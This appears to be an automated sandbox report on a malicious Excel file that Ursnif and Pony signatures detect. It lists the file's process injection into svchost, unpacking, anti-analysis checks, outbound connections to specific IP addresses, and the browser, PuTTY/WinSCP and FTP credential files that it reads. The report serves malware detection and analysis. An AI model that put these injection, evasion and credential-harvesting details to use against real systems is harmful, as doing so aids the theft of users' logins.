          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: tr_0.xls | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Unpacked PE file: 13.2.BN6D10.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Unpacked PE file: 13.2.BN6D10.tmp.400000.0.unpack
          Yara detected aPLib compressed binary
          Source: Yara match | File source: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.461350530.0000000005100000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.461304914.0000000005A01000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3708, type: MEMORY
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Source: Yara match | File source: 6.3.svchost.exe.5800000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5100000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5c00000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.svchost.exe.bc00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5c00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5c00000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.svchost.exe.bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02443800 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,6_2_02443800
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B85C0 push edx; ret 5_2_046B874E
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B24BD push edi; ret 5_2_046B24BE
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B0764 pushfd ; retf 5_2_046B0765
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B48BD push edx; iretd 5_2_046B48BF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC0B7F5 push ecx; ret 12_2_0BC0B808
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00F673B1 push es; ret 13_2_00F673D5
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00F6B26C push es; iretd 13_2_00F6B2B2
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00F6D91E push ax; iretd 13_2_00F6D913
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00F6D90A push ax; iretd 13_2_00F6D913

          Persistence and Installation Behavior:

          Drops PE files to the document folder of the user
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Documents\dDdoiBj.ocx
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Documents\dDdoiBj.ocx
          Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\BN6D10.tmp

          Hooking and other Techniques for Hiding and Protection:

          Yara detected Ursnif
          Source: Yara match | File source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC061DF lstrlenA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_0BC061DF
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Found evasive API chain (may stop execution after checking locale)
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Evasive API call chain: GetLocaleInfo, StrStr, ExitProcess (graph_13-1088)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
          Source: C:\Windows\SysWOW64\svchost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_6-7014)
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980 | Thread sleep count: 212 > 30
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980 | Thread sleep time: -12720000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980 | Thread sleep count: 210 > 30
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980 | Thread sleep time: -12600000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\WerFault.exe | File opened: PhysicalDrive0
          Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_100068C0 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_100068C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000419E FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000419E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10004DF4 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,6_2_10004DF4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10007241 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10007241
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10004A84 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10004A84
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000673C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000673C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC01FD3 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0BC01FD3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC03D27 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_0BC03D27
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC06401 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_0BC06401
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02443690 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_02443690
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\idb\
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\
          Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmp | Binary or memory string: MSAFD Irda [IrDA]Hyper-V RAWMozilla/4.0 (compatible; MSIE 8.0; Windows Phone OS 7.5; Trident/4.0; IEMobile/8.0)Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/8.0; Touch; rv:11.0; IEMobile/11.0) like GeckowbG`|M
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW(
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node (graph_6-7098)
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | API call chain: ExitProcess graph end node (graph_13-996)
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_046B7C00 LdrInitializeThunk,VirtualAlloc,5_2_046B7C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC09FDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0BC09FDC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02443800 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,6_2_02443800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442B50 mov eax, dword ptr fs:[00000030h] 6_2_02442B50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10009F63 mov eax, dword ptr fs:[00000030h] 6_2_10009F63
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC09DF5 mov eax, dword ptr fs:[00000030h] 12_2_0BC09DF5
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_00F65D8B push dword ptr fs:[00000030h] 13_2_00F65D8B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02441390 GetProcessHeap,RtlAllocateHeap,6_2_02441390
          Source: C:\Windows\SysWOW64\WerFault.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000B836 SetUnhandledExceptionFilter,RevertToSelf,6_2_1000B836
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC09FDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0BC09FDC
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_004021A7 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,13_2_004021A7
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory protected: page execute read | page execute and read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 54.225.191.113 80
          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 91.218.231.226 80
          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.206.163.136 187
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2440000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2440000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BC00000 value starts with: 4D5A
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2440000
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 22F1008
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000B56A lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,6_2_1000B56A
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /K
          Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
          Source: Yara match | File source: tr_0.xls, type: SAMPLE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10002EF5 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_10002EF5
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmp | Binary or memory string: Program ManagerWv{
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_100044F3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetVersionExA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LocalAlloc,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,12_2_0BC02741
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: LdrInitializeThunk,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,13_2_00401676
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Code function: 13_2_0040177C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,13_2_0040177C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000B763 OleInitialize,GetUserNameA,6_2_1000B763
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02441580 GetVersion,wsprintfA,wsprintfA,6_2_02441580

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Yara detected PonyShow sources
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\SysWOW64\svchost.exe; File opened (registry paths are reported under the same label):
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
          • C:\Users\user\AppData\Local\CuteFTP\
          • C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
          • C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
          • C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          • C:\Users\user\AppData\Local\FlashFXP\4\History.dat
          • C:\Users\user\AppData\Local\SmartFTP\
          • C:\ProgramData\FileZilla\sitemanager.xml
          • C:\Users\user\AppData\Local\FlashFXP\3\History.dat
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
          • C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
          • C:\Users\user\AppData\Roaming\CuteFTP\
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
          • C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
          • C:\ProgramData\FlashFXP\3\Quick.dat
          • C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
          • C:\Users\user\AppData\Roaming\SmartFTP\
          • C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
          • C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
          • C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
          • C:\ProgramData\CuteFTP\sm.dat
          • C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
          • C:\Users\user\AppData\Local\FileZilla\filezilla.xml
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
          • C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
